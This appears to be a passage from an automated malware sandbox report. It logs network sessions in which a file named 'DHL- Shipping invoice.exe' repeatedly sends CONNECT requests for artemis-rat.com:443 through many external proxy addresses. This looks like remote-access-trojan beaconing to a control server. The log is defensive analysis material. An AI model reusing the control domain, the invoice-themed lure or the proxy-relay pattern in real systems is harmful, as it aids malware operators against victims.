                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.149713993 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2104192.168.2.45547039.109.113.9731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.549155951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.749752998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843873978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.953270912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.140440941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:47.140480995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:59.143080950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:23.156048059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2105192.168.2.45317492.204.134.38258256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.549638987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.749792099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2106192.168.2.455508198.12.255.193516126484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.557543039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.749789000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843878984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.953274012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.140458107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:47.140696049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:59.143085003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:23.156918049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:11.305269957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2107192.168.2.453323148.72.23.5632606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.563002110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562684059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563241959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.562891960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.562318087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2108192.168.2.453157161.97.173.42622896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.563329935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750174999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843873024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.953286886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.140413046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:59.140420914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:47.156121969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2109192.168.2.45549831.43.33.5641536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.566282034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2110192.168.2.453320162.214.121.173448266484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.566375017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.765388012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.859380007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.859277010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.952873945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:47.077912092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:59.265535116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:23.359184980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:11.562278032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2111192.168.2.453229185.79.243.153384316484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.566886902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2112192.168.2.453239161.97.163.52232886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.567112923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.249824047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953339100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250107050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750137091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265739918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2113192.168.2.455664162.253.68.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.630750895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2114192.168.2.45565274.119.144.6041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.634005070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2115192.168.2.455639123.241.210.123806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.644942045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.343774080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.343717098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2116192.168.2.455560217.145.199.47567466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.664810896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2117192.168.2.45336694.20.183.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.836654902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2118192.168.2.455665103.200.135.22841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.839256048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2119192.168.2.4537435.9.112.24731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:11.847825050 CET161INHTTP/1.1 503 Too many open connections
                            Proxy-Agent: Privoxy 3.0.21
                            Content-Type: text/plain
                            Connection: close
                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                            Data Ascii: Maximum number of open connections reached.
                            Mar 12, 2024 08:37:12.586324930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2120192.168.2.45567745.11.95.16560046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.523652077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2121192.168.2.4556708.213.128.908086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.524203062 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2122192.168.2.455679185.79.243.153384316484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.524205923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2123192.168.2.453407137.184.182.145283576484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.531869888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640700102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.749325991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.749946117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.754064083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.843552113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:00.859134912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:24.859159946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2124192.168.2.45558767.201.33.10252836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.531940937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2125192.168.2.45344683.229.61.20431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.532229900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.376370907 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2126192.168.2.45568174.119.144.6041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.532274961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2127192.168.2.455672143.64.8.2180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.536190987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
